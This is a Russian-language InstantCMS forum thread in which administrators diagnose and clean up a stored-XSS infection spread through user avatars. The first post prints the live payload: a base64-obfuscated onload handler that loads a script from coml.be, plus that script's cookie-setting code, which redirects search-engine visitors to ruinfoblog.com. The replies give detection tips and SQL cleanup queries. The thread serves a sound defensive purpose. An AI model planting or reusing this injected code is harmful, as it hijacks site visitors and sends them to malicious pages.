Обнаружен вирус на некоторых сайтах instantcms!

Проверьте свои сайты!

#1 6 декабря 2017 в 14:45
Уже насчитал больше 5 зараженных сайтов

Вирус делает перенаправление на левый сайт людей пришедших к вам из поисковиков


История с первым обнаружением и чем опасен вирус для самого сайта
тут — instantcms.ru/forum/thread28582-1.html


Подробности работы вируса:

К аватарке юзера прицеплен код
  1. <img src="/upload/003/u364/a3/03/dfb0d8e4.jpg" onload="eval(atob('dmFyIG49ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7bi5zcmM9Ii8vY29tbC5iZS9pYyI7ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoImJvZHkiKVswXS5hcHBlbmRDaGlsZChuKTs='))"
  2. width="32" height="32" alt="Елена Кучукова" title="Елена Кучукова" />
  3. </a>
Имя может быть любым

Который добавляет в тело подгрузку еще одного скрипта с адреса coml.be
  1. var n=document.createElement("script");
  2. n.src="//coml.be/ic";
  3. document.getElementsByTagName("body")[0].appendChild(n);

Скрипт coml.be проверяет/ставит свои куки, смотрит с поисковика ли и делает редирект на левый сайт
  1. var rref5877=document.referrer, rt5877=GetCookie5877('r5877'), ExpDate=new Date();if(parent.window.opener && (rref5877.indexOf('google')+1 || rref5877.indexOf('nova.rambler')+1)){if(rt5877==null){parent.window.opener.location.replace("http://ruinfoblog.com/out/?eUwaYQNoJENT");}} else if(rref5877.indexOf('google')+1 || rref5877.indexOf('yandex')+1 || rref5877.indexOf('go.mail')+1 || rref5877.indexOf('nova.rambler')+1){if(rt5877==null){document.onclick = function(){window.open('http://ruinfoblog.com/out/?eUwaYQNoJENT');document.onclick = null;};}} rref5877=unescape(rref5877);ExpDate.setTime(ExpDate.getTime()+(24*60*60*1000*30));SetCookie5877('r5877', '1', ExpDate, "/");function GetCookie5877Val(offset){var endstr=document.cookie.indexOf(";", offset);if(endstr==-1)endstr=document.cookie.length;return unescape(document.cookie.substring(offset, endstr));}function GetCookie5877(name){var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;while(i<clen){var j=i+alen;if(document.cookie.substring(i, j)==arg) return GetCookie5877Val(j);i=document.cookie.indexOf(" ", i)+1;if(i == 0) break;}return null;}function SetCookie5877(name, value){var argv=SetCookie5877.arguments;var argc=SetCookie5877.arguments.length;var expires=(argc>2)?argv[2]:null;var path=(argc>3)?argv[3]:null;var domain=(argc>4)?argv[4]:null;var secure=(argc>5)?argv[5]:false;document.cookie=name+"="+escape(value)+((expires==null)?"":("; expires="+expires.toGMTString()))+((path==null)?"":("; path="+path))+((domain==null)?"":("; domain="+domain))+((secure==true)?"; secure":"");}


Проверьте свои сайты!

Как проверить?

Зайдите на свой сайт и посмотрите куки
если есть r5877 значит вирус есть

Как быстро удалить?

Посмотрите юзеров зарегистрировавшихся за последние 2-3 недели
ищите аватарку женщины на черном фоне, и удалите юзера.
Вы видели эту женщину?

Полечиться можно вот таким запросом, выполнив его в phpmyadmin

  1.  
  2. UPDATE `cms_users` SET `avatar`= NULL WHERE `avatar` LIKE '%onload%'

Fuze



Как обезопасить себя?

Читать внимательно пост Fuze — instantcms.ru/forum/thread28589-1.html#276383
#2 6 декабря 2017 в 14:59

Мне пока не известно через уязвимость в каком компоненте добавлен код,

Sonat
А взлом не рассматривали?
#3 6 декабря 2017 в 15:03
а то я смотрю, на одном из моих проектов стали редиректы сыпаться…
проверю сейчас, спасибо
#4 6 декабря 2017 в 15:06
Какой хостинг сразу пишите, может это у кого до уязвимость
#5 6 декабря 2017 в 15:07

А взлом не рассматривали?

Jestik
Не понял вопрос. scratchНу, да, это взлом, через уязвимость какого-то компонента или движка (что маловероятно).


Какой хостинг сразу пишите, может это у кого до уязвимость

Jestik
Разные сайты на разных хостингах — объединяет их то что они на instantcms
#6 6 декабря 2017 в 15:26
Sonat

В Вашем сообщении #1 отсутствует верхняя строка и есть только завершающий тег ссылки.
В сообщении #14 Сегодня в 14:27 здесь правильно, там два тега.
#7 6 декабря 2017 в 15:46
Есть xss, да.
1. Отсюда возьмите файлы image.php и images.php и замените их у себя.
2. В файле /system/libs/html.helper.php замените аналогичные строки вот так и вот так

Основной дистрибутив версии 2.8.2 и пакет обновления обновлены.

Для любых версий ниже 2.8.2 можно выполнить только второй пункт. Зловредный код пройдёт, но не будет работать.

Полечиться можно вот таким запросом, выполнив его в phpmyadmin
  1. UPDATE `cms_users` SET `avatar`= NULL WHERE `avatar` LIKE '%onload%'
где cms_users — ваша таблица юзеров, avatar — системное имя поля с аватаром. Аналогично можно проделать с другими таблицами, где есть поля изображений и юзеры могут добавлять записи.

  1. UPDATE `НАЗВАНИЕ_ТАБЛИЦЫ` SET `СИСТЕМНОЕ_ИМЯ_ПОЛЯ_ИЗОБРАЖЕНИЯ`= NULL WHERE `СИСТЕМНОЕ_ИМЯ_ПОЛЯ_ИЗОБРАЖЕНИЯ` LIKE '%onload%'
P.S. ну и конечно это не вирус, обычная xss
#8 6 декабря 2017 в 17:51
Fuze, Спасибо! v

Рекомендуется ли всем обновиться?
#9 6 декабря 2017 в 17:57
Кстати, как я почта была у этого аккаунта с женщиной? Везде разная?
#10 6 декабря 2017 в 18:02
Jestik, Не знаю, почта же крыта у всех, сайты не мои, доступа в админку нет.
#11 6 декабря 2017 в 18:45


Кстати, как я почта была у этого аккаунта с женщиной? Везде разная?

Jestik
На моем selena.kuchukova@ mail.ru

Автору топика и Fuze премного благодарностей за решение проблемы! Пошел латать дырки))
#12 6 декабря 2017 в 20:14
У себя нашел именно с таким аватаром



Спасибо за информацию!!

Бегу изгонять дьявола
#13 6 декабря 2017 в 20:35

В файле /system/libs/html.helper.php замените аналогичные строки вот так и вот так

Fuze

У меня отличаются данные файлы. версия 2,8,2

Подскажите ориентировочно в какой строке изменить?

Заменил файлы взяв их из дистрибутива
#14 7 марта 2018 в 20:33
В продолжение темы — два дня назад упал трафик на еще одном сайте на ICMS2 — cf-team.ru
Первым делом пошел проверять редирект — теперь не родительская страница, а открывается отдельное окно.
В куках висит подозрительная хренотень: r6479 — видимо такая же, как из прошлой ситуации.
Что проверил:
Подозрительных пользователей с аватарками нет;
Выполнил поиск не только по полю аватар, но и по всей базе рекомендовано Fuze;
Прошлое лекарство с учетом версии (у меня 2.7.2) было добавлено еще в прошлый раз.
Что думаете, господа? Где-то еще дырка или какой-то сторонний компонент шалит?
Вот на этом сайте, увы, всякого добра вагон — и форум, и куча мелких модулей. Но нового ничего не добавлялось уже больше 7 месяцев.
#15 7 марта 2018 в 22:42
Очередной раз почитал тему про вирусы на сайте и полез смотреть куки в браузере.
То что увидел сильно удивило и одновременно насторожило, так как кроме объяснимых куков есть совершенно непонятно откуда взявшиеся.
Вот список
Это на одном сайте, на другом чуть меньше и на том что практически не работает только первый кук без имени.
Кто что подскажет? Что это за "гости", стоит ли их опасаться и как выпроводить?
Вы не можете отвечать в этой теме.
Войдите или зарегистрируйтесь, чтобы писать на форуме.
Используя этот сайт, вы соглашаетесь с тем, что мы используем файлы cookie.